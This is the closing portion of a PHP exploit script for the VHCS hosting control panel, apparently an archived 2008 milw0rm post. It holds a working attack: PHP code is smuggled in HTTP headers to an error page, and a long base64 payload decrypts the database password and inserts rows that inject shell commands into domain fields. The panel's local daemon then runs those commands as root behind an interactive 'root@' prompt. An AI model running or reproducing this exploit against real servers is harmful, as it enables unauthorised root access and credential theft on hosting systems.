$this->sql_res_arr explode('PWNEDCONTENT'$this->getcontent());

            
$this->sql_result  pack('H*'$this->sql_res_arr[1]);
        }
    
        return 
$this->sql_result;
    }

    function 
is_safe()
    {
        
$this->phpc =
        
'if(in_array(strtoupper(ini_get("safe_mode")),array("ON","1")) '
           
.'or !function_exists("shell_exec")) '
           
.'{ print "safe_mode=on"; }';

        
$this->exec_php($this->phpc);

        
# open_basedir always set
        
if(ereg('safe_mode=on'$this->getcontent()))
        {
            
$this->msg("We'll have to bypass open_basedir cause safe_mode=On"0);

            
$this->safe_mode TRUE;
        }
        else
        {
            
$this->msg('PHP configured with default safe_mode value (Off)'0);

            
$this->safe_mode FALSE;
        }

        return 
$this->safe_mode;
    }

    function 
exec_cmd()
    {
        
$this->msg("Now you can execute commands as root =]"1);

        
$this->woot_code =
         
'PD9waHAKCi8qCm1haWwoJ2xlZXRAcHduZWQuY29tJywgJ3Z1bG'
        
.'5lcmFibGUgdmhjcyBob3N0ICEnLCAndGh4IHRvIHRoZSBzayAh'
        
.'IHZoY3MgdnVsbiBob3N0OiAnLiRfU0VSVkVSWydSRU1PVEVfQU'
        
.'REUiddKTsKdGhpcyBpcyBhIGpva2UgPVAgd2hlbiB5b3UgdXNl'
        
.'IGVuY29kZWQgcGhwIGNvZGUsIHNlZSB3aGF0IGlzIGl0IGJlZm'
        
.'9yZSB1c2luZyBpdCA9KQoqLwokdmFsaWRfdiA9ICdIVFRQX1NQ'
        
.'TE9JVF8nOwoKZm9yZWFjaCgkX1NFUlZFUiBhcyAkaGVhZGVyID'
        
.'0+ICR2YWx1ZSkKewoJaWYoIWlzX2FycmF5KCR2YWx1ZSkpCgl7'
        
.'CgkJJHZhbHVlID0gYmFzZTY0X2RlY29kZSgkdmFsdWUpOwoKCQ'
        
.'lpZihlcmVnKCR2YWxpZF92LCRoZWFkZXIpKQoJCXsKCQkJaWYo'
        
.'ZXJlZygnUEhQX0tFWVMnLCAkaGVhZGVyKSkKCQkJICAgZXZhbC'
        
.'gkdmFsdWUpOwoKCQkJZWxzZQoJCQl7CgkJCQkkdmFyX24gID0g'
        
.'c3RydG9sb3dlcihzdHJfcmVwbGFjZSgkdmFsaWRfdiwnJywgJG'
        
.'hlYWRlcikpOwoJCQkJJCR2YXJfbiA9ICR2YWx1ZTsKCQkJfQoJ'
        
.'CX0KCX0KfQoKbXlzcWxfY29ubmVjdCgkZGJfaG9zdCwkZGJfdX'
        
.'NlcixkZWNyeXB0X2RiX3Bhc3N3b3JkKCRkYl9wYXNzKSk7Cm15'
        
.'c3FsX3NlbGVjdF9kYigkZGJfbmFtZSk7CgokZmlsZSA9IGFkZH'
        
.'NsYXNoZXMoJGZpbGUpOwokY21kICA9IGFkZHNsYXNoZXMoJGNt'
        
.'ZCk7CiRWZXJzaW9uID0gJHZlcnNpb247CgokYWRkID0gYXJyYX'
        
.'koKTsKJGFkZFtdID0gCiJJTlNFUlQgSU5UTyBkb21haW4gKGBk'
        
.'b21haW5fbmFtZWAsYGRvbWFpbiIuCiJfZ2lkYCxgZG9tYWluX3'
        
.'VpZGAsYGRvbWFpbl9hZG1pbl9pZGAsYGRvbSIuCiJhaW5fY3Jl'
        
.'YXRlZF9pZGAsYGRvbWFpbl9jcmVhdGVkYCxgZG9tYWluXyIuCi'
        
.'JsYXN0X21vZGlmaWVkYCxgZG9tYWluX21haWxhY2NfbGltaXRg'
        
.'LGBkbyIuCiJtYWluX2Z0cGFjY19saW1pdGAsYGRvbWFpbl90cm'
        
.'FmZmljX2xpbWl0YCIuCiIsYGRvbWFpbl9zcWxkX2xpbWl0YCxg'
        
.'ZG9tYWluX3NxbHVfbGltaXRgLCIuCiJgZG9tYWluX3N0YXR1c2'
        
.'AsYGRvbWFpbl9hbGlhc19saW1pdGAsYGRvbSIuCiJhaW5fc3Vi'
        
.'ZF9saW1pdGAsYGRvbWFpbl9pcF9pZGAsYGRvbWFpbl9kaSIuCi'
        
.'Jza19saW1pdGAsYGRvbWFpbl9kaXNrX3VzYWdlYCxgZG9tYWlu'
        
.'X3BocCIuCiJgLGBkb21haW5fY2dpYCkgVkFMVUVTICgnZGVsZX'
        
.'RlbWViaWF0Y2g7JGNtZCIuCiIgPiAkZmlsZTtybSAvdG1wL2h0'
        
.'YWNjZXNzLXVzZXItY2YtZGVsZXRlbSIuCiJlYmlhdGNoO2VjaG'
        
.'8gMSMnLCcwJywgJzAnLCAnLTEnLCAnLTEnLCAnMCIuCiInLCAn'
        
.'MCcsICcwJywgJzAnLCAnMCcsICcwJywgJzAnLCdvaycsICcwJy'
        
.'IuCiIsJzAnLCAnLTEnLCAnMCcsICcwJywgJ3llcycsICd5ZXMn'
        
.'KSI7CgokYWRkW10gPQoiSU5TRVJUIElOVE8gaHRhY2Nlc3MgKG'
        
.'BkbW5faWRgLGB1c2VyX2lkYCwiLgoiYGdyb3VwX2lkYCxgYXV0'
        
.'aF90eXBlYCxgYXV0aF9uYW1lYCxgcGF0aGAiLgoiLGBzdGF0dX'
        
.'NgKSBWQUxVRVMgKChTRUxFQ1QgZG9tYWluX2lkIEZST00iLgoi'
        
.'IGRvbWFpbiBXSEVSRSBkb21haW5fbmFtZSBMSUtFICclJGZpbG'
        
.'UlJykiLgoiLC0xLDAsJ0Jhc2ljJywnaHVodScsJy90bXAnLCd0'
        
.'b2FkZCcpIjsKCmV4ZWNfc3FsKCRhZGQpOwoKc2VuZF9yZXF1ZX'
        
.'N0KCk7CnNsZWVwKCRzbGVlcF90aW1lKTsKcHJpbnQoZmlsZV9n'
        
.'ZXRfY29udGVudHMoJGZpbGUpKTsKdW5saW5rKCRmaWxlKTsKCi'
        
.'RkZWwgPSBhcnJheSgpOwokZGVsW10gPSAKIkRFTEVURSBGUk9N'
        
.'IGh0YWNjZXNzIFdIRVJFIGRtbl9pZCA9IChTRUxFQyIuCiJUIG'
        
.'RvbWFpbl9pZCBGUk9NIGRvbWFpbiBXSEVSRSBkb21haW5fbmFt'
        
.'ZSAiLgoiTElLRSAnJSRmaWxlJScpIjsKCiRkZWxbXSA9CiJERU'
        
.'xFVEUgRlJPTSBkb21haW4gV0hFUkUgZG9tYWluX25hbWUgTElL'
        
.'RSAiLgoiJyUkZmlsZSUnIjsKCmV4ZWNfc3FsKCRkZWwpOwoKZn'
        
.'VuY3Rpb24gZXhlY19zcWwoJHNxbF9hcnIpCnsKCWZvcmVhY2go'
        
.'JHNxbF9hcnIgYXMgJHNxbF9xKQoJICAgbXlzcWxfcXVlcnkoJH'
        
.'NxbF9xKSB8fCBkaWUobXlzcWxfZXJyb3IoKSk7CgoJcmV0dXJu'
        
.'Owp9CgovLyB2aGNzCmZ1bmN0aW9uIGRlY3J5cHRfZGJfcGFzc3'
        
.'dvcmQgKCRkYl9wYXNzKSB7CgogICAgIGdsb2JhbCAkdmhjczJf'
        
.'ZGJfcGFzc19rZXk7CiAgICAgZ2xvYmFsICR2aGNzMl9kYl9wYX'
        
.'NzX2l2OwogICAgICAgICAgIAogICAgJHRleHQgPSBiYXNlNjRf'
        
.'ZGVjb2RlKCIkZGJfcGFzc1xuIik7CiAgICAKICAgIC8qIE9wZW'
        
.'4gdGhlIGNpcGhlciAqLwogICAgJHRkID0gbWNyeXB0X21vZHVs'
        
.'ZV9vcGVuICgnYmxvd2Zpc2gnLCAnJywgJ2NiYycsICcnKTsKIC'
        
.'AgIAogICAgLyogQ3JlYXRlIGtleSAqLwogICAgICAgICRrZXkg'
        
.'PSAkdmhjczJfZGJfcGFzc19rZXk7CiAgICAKICAgIC8qIENyZW'
        
.'F0ZSB0aGUgSVYgYW5kIGRldGVybWluZSB0aGUga2V5c2l6ZSBs'
        
.'ZW5ndGggKi8KICAgICAgICAkaXYgPSAkdmhjczJfZGJfcGFzc1'
        
.'9pdjsKICAgICAgCiAgICAvKiBJbnRpYWxpemUgZW5jcnlwdGlv'
        
.'biAqLyAgICAgICAgICAgICAgICAgICAgCiAgICBtY3J5cHRfZ2'
        
.'VuZXJpY19pbml0ICgkdGQsICRrZXksICRpdik7CiAgICAgICAg'
        
.'ICAgICAgICAgICAgICAKICAgIC8qIERlY3J5cHQgZW5jcnlwdG'
        
.'VkIHN0cmluZyAqLyAgICAKICAgICRkZWNyeXB0ZWQgPSBtZGVj'
        
.'cnlwdF9nZW5lcmljICgkdGQsICR0ZXh0KTsKICAgICAgICAgIC'
        
.'AgICAgICAgICAgICAgICAKICAgIG1jcnlwdF9tb2R1bGVfY2xv'
        
.'c2UgKCR0ZCk7CiAgICAgICAgICAgICAgICAgICAgICAgICAgIC'
        
.'AgICAgCiAgICAvKiBTaG93IHN0cmluZyAqLyAgICAgICAgICAg'
        
.'ICAgICAgICAgICAgICAgICAgICAgICAKICAgIHJldHVybiB0cm'
        
.'ltKCRkZWNyeXB0ZWQpOwp9CgovLyB2aGNzCmZ1bmN0aW9uIHNl'
        
.'bmRfcmVxdWVzdCgpIHsKCiAgICBnbG9iYWwgJFZlcnNpb24sIC'
        
.'RWZXJzaW9uSCwgJEJ1aWxkRGF0ZTsKCiAgICBAJHNvY2tldCA9'
        
.'IHNvY2tldF9jcmVhdGUgKEFGX0lORVQsIFNPQ0tfU1RSRUFNLC'
        
.'AwKTsKCiAgICBpZiAoJHNvY2tldCA8IDApIHsKICAgICAgICAk'
        
.'ZXJybm8gPSAgInNvY2tldF9jcmVhdGUoKSBmYWlsZWQuXG4iOw'
        
.'ogICAgICAgIHJldHVybiAkZXJybm87CiAgICB9CgogICAgQCRy'
        
.'ZXN1bHQgPSBzb2NrZXRfY29ubmVjdCAoJHNvY2tldCwgIjEyNy'
        
.'4wLjAuMSIsIDk4NzYpOwogICAgaWYgKCRyZXN1bHQgPT0gRkFM'
        
.'U0UpIHsKICAgICAgICAkZXJybm8gPSAgInNvY2tldF9jb25uZW'
        
.'N0KCkgZmFpbGVkLlxuIjsKICAgICAgICByZXR1cm4gJGVycm5v'
        
.'OwogICAgfQoKICAgIC8qIHJlYWQgb25lIGxpbmUgd2l0aCB3ZW'
        
.'xjb21lIHN0cmluZyAqLwogICAgJG91dCA9IHJlYWRfbGluZSgk'
        
.'c29ja2V0KTsKCiAgICAvKiBzZW5kIGhlbGxvIHF1ZXJ5ICovCi'
        
.'AgICAkcXVlcnkgPSAiaGVsbyAgJFZlcnNpb25cclxuIjsKICAg'
        
.'IHNvY2tldF93cml0ZSAoJHNvY2tldCwgJHF1ZXJ5LCBzdHJsZW'
        
.'4gKCRxdWVyeSkpOwoKICAgIC8qIHJlYWQgb25lIGxpbmUgd2l0'
        
.'aCBoZWxvIGFuc3dlciAqLwogICAgJG91dCA9IHJlYWRfbGluZS'
        
.'gkc29ja2V0KTsKCiAgICAvKiBzZW5kIHJlZyBjaGVjayBxdWVy'
        
.'eSAqLwogICAgJHF1ZXJ5ID0gImV4ZWN1dGUgcXVlcnlcclxuIj'
        
.'sKICAgIHNvY2tldF93cml0ZSAoJHNvY2tldCwgJHF1ZXJ5LCBz'
        
.'dHJsZW4gKCRxdWVyeSkpOwogICAgLyogcmVhZCBvbmUgbGluZS'
        
.'BrZXkgcmVwbGF5ICovCiAgICAkZXhlY3V0ZV9yZXBsYXkgPSBy'
        
.'ZWFkX2xpbmUoJHNvY2tldCk7CgogICAgLyogc2VuZCBxdWl0IH'
        
.'F1ZXJ5ICovCiAgICAkcXVpdF9xdWVyeSA9ICJieWVcclxuIjsK'
        
.'ICAgIHNvY2tldF93cml0ZSAoJHNvY2tldCwgJHF1aXRfcXVlcn'
        
.'ksIHN0cmxlbiAoJHF1aXRfcXVlcnkpKTsKICAgIC8qIHJlYWQg'
        
.'cXVpdCBhbnN3ZXIgKi8KICAgICRxdWl0X3JlcGxheSA9IHJlYW'
        
.'RfbGluZSgkc29ja2V0KTsKCiAgICAvKiBhbmFseXplIGtleSBy'
        
.'ZXBsYXkgKi8KICAgICRhbnN3ZXIgPSAkZXhlY3V0ZV9yZXBsYX'
        
.'k7CgogICAgLyogY2xvc2Ugc29ja2V0ICovCiAgICBzb2NrZXRf'
        
.'Y2xvc2UgKCRzb2NrZXQpOwoKICAgIC8qIHJldHVybiBmdW5jdG'
        
.'lvbiByZXN1bHQgKi8KICAgIHJldHVybiAkYW5zd2VyOwoKfQoK'
        
.'Ly8gdmhjcwpmdW5jdGlvbiByZWFkX2xpbmUoJHNvY2tldCkgew'
        
.'0KICAgICRjaCA9ICcnOw0KICAgICRsaW5lID0gJyc7DQogICAg'
        
.'ZG97DQogICAgICAgICRjaCA9IHNvY2tldF9yZWFkKCRzb2NrZX'
        
.'QsMSk7DQogICAgICAgICRsaW5lID0gJGxpbmUgLiAkY2g7DQog'
        
.'ICAgfSB3aGlsZSgkY2ggIT0gIlxyIik7DQogICAgcmV0dXJuIC'
        
.'RsaW5lOw0KfQo/Pgo=';

         while(
$this->cmd_prompt())
        {
            
$this->exec_php('print $_SERVER["DOCUMENT_ROOT"];');
            
$this->tmp_file $this->getcontent().'/'.md5(rand());

            
$this->set_hvar('db-host',    $this->conf['DATABASE_HOST']);
            
$this->set_hvar('db-user',    $this->conf['DATABASE_USER']);
            
$this->set_hvar('db-pass',    $this->conf['DATABASE_PASSWORD']);
            
$this->set_hvar('db-name',    $this->conf['DATABASE_NAME']);

            
$this->set_hvar('sleep-time'$this->sleep_time);
            
$this->set_hvar('file',       $this->tmp_file);
            
$this->set_hvar('cmd',        $this->cmd);
            
$this->set_hvar('version',    $this->conf['Version']);
            
            
$this->set_hvar('php-keys',   '?>'.$this->php_keys_code);

            
$this->exec_php('?>'.base64_decode($this->woot_code));

            print 
"\n".$this->getcontent();
        }

        exit(
0);
    }

    function 
set_hvar($name$value)
    {
        
$this->addheader('Sploit-'.$namebase64_encode($value));

        return;
    }

    function 
cmd_prompt()
    {
        
$this->msg('root@'.$this->usr.': '1);
        
$this->cmd trim(fgets(STDIN));

        if(!
ereg('^(quit|exit)$'$this->cmd))
           return 
TRUE;

        else
           return 
FALSE;
    }

    function 
exec_php($php)
    {
        
$this->addheader('Shell'base64_encode($php));
        
$this->get($this->dmn_url.'/errors/404/index.php');

        return;
    }

    function 
msg($msg$flag$action=0)
    {
        print 
"\n ".$this->flags[$flag]."\x20".$msg;

        switch(
$action)
        {
            case 
1:
                print 
"\n";
                return 
$this->usage();
            break;

            case 
2:
                print 
"\n";
                exit(
1);
            break;
        }
    }
}

$spl = new vhcs_xpl;
$spl->main();

?>

# milw0rm.com [2008-03-09]